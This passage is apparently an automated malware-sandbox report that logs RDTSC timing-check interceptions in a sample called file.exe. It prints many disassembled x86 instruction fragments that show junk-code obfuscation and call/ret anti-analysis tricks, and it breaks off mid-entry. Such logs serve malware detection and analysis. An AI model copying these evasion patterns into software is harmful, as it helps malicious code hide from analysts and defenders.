Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91651C second address: 916558 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007F2D810C1E68h 0x0000000f jmp 00007F2D810C1E62h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2D810C1E63h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916558 second address: 91655E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91655E second address: 916569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2D810C1E56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916649 second address: 91669F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, dword ptr [ebp+122D39FFh] 0x00000010 lea eax, dword ptr [ebp+12478F24h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F2D807904A8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 jmp 00007F2D807904AAh 0x00000035 ja 00007F2D807904ACh 0x0000003b nop 0x0000003c jp 00007F2D807904AEh 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91669F second address: 9166AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9166AC second address: 9166B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9166B1 second address: 9166B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9166B7 second address: 8FB97B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, 1FA6FE3Fh 0x0000000e call 00007F2D807904AAh 0x00000013 pop edi 0x00000014 lea eax, dword ptr [ebp+12478EE0h] 0x0000001a ja 00007F2D807904ACh 0x00000020 push eax 0x00000021 jmp 00007F2D807904B1h 0x00000026 mov dword ptr [esp], eax 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F2D807904A8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 xor dword ptr [ebp+122D2069h], ebx 0x00000049 call dword ptr [ebp+122D36A3h] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007F2D807904B5h 0x00000057 jne 00007F2D807904A6h 0x0000005d popad 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB97B second address: 8FB98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2D810C1E56h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB98A second address: 8FB99B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D807904ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CE475 second address: 8CE492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jns 00007F2D810C1E56h 0x0000000b je 00007F2D810C1E56h 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CE492 second address: 8CE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F2D807904B1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94A7EF second address: 94A83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E66h 0x00000007 pushad 0x00000008 jns 00007F2D810C1E56h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F2D810C1E5Eh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007F2D810C1E63h 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 pop edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94A83C second address: 94A857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904ACh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F2D807904A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94A857 second address: 94A85D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AC75 second address: 94AC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jno 00007F2D807904A6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AC84 second address: 94AC8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AC8A second address: 94AC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AC8E second address: 94AC92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94ADEB second address: 94ADF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AF35 second address: 94AF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F7DF second address: 94F7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F7E3 second address: 94F7ED instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2D810C1E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94FC5B second address: 94FC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94FC60 second address: 94FC67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94FC67 second address: 94FC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94FC70 second address: 94FC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94FC74 second address: 94FC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94FE30 second address: 94FE38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95070C second address: 950719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F2D807904A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 950719 second address: 95071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95071D second address: 95072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95072C second address: 95073C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2D810C1E62h 0x00000008 jp 00007F2D810C1E56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95073C second address: 950746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 950746 second address: 95074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95074A second address: 95074E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954E9B second address: 954EA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954F96 second address: 954F9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954F9E second address: 954FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95522F second address: 955233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955233 second address: 955268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F2D810C1E65h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2D810C1E66h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955268 second address: 955277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9553CD second address: 9553EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F2D810C1E56h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F2D810C1E5Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9553EC second address: 9553F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556A4 second address: 9556AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556AA second address: 9556AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556AE second address: 9556B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556B2 second address: 9556BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556BE second address: 9556C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9556C2 second address: 9556DD instructions: 0x00000000 rdtsc 0x00000002 je 00007F2D807904A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F2D807904AAh 0x00000012 pop ecx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955974 second address: 95597B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95492D second address: 954931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9599BA second address: 9599BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9599BE second address: 9599FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F2D807904A6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 push edx 0x00000012 jns 00007F2D807904B2h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2D807904B9h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95EE82 second address: 95EE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960C14 second address: 960C1E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2D807904ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960D92 second address: 960D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960D98 second address: 960D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960D9C second address: 960DA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960DA2 second address: 960DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2D807904B9h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnl 00007F2D807904A6h 0x00000016 jmp 00007F2D807904B3h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960DE5 second address: 960DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963E64 second address: 963E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B3h 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963E80 second address: 963E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963E86 second address: 963E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F2D807904ACh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963E9D second address: 963EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963EAF second address: 963EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9638B6 second address: 9638E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F2D810C1E68h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jc 00007F2D810C1E56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963A2D second address: 963A3C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2D807904AAh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 967B00 second address: 967B0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F2D810C1E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9671F1 second address: 9671FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F2D807904A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9671FE second address: 967215 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2D810C1E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2D810C1E56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 967215 second address: 96723C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B5h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2D807904ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96723C second address: 967244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 967244 second address: 967248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96736C second address: 9673A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2D810C1E56h 0x00000008 jmp 00007F2D810C1E66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jp 00007F2D810C1E56h 0x0000001d popad 0x0000001e push edi 0x0000001f push edx 0x00000020 pop edx 0x00000021 jnl 00007F2D810C1E56h 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D2BC second address: 96D2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D2C2 second address: 96D2FD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2D810C1E56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F2D810C1E63h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007F2D810C1E58h 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007F2D810C1E56h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D2FD second address: 96D307 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2D807904A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D307 second address: 96D30D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D30D second address: 96D311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BBE7 second address: 96BBFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BBFE second address: 96BC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007F2D807904A6h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 jng 00007F2D807904A6h 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d jmp 00007F2D807904AAh 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BC2A second address: 96BC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BC2E second address: 96BC38 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2D807904A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BC38 second address: 96BC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BC3E second address: 96BC48 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2D807904B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96BC48 second address: 96BC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C1B3 second address: 96C1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C1BB second address: 96C1C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91600B second address: 916015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2D807904A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916015 second address: 916019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916019 second address: 91603C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F2D807904B8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91603C second address: 9160B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2D810C1E56h 0x00000009 jmp 00007F2D810C1E69h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F2D810C1E58h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c and cx, 4F00h 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F2D810C1E58h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov edx, 5EE37483h 0x00000052 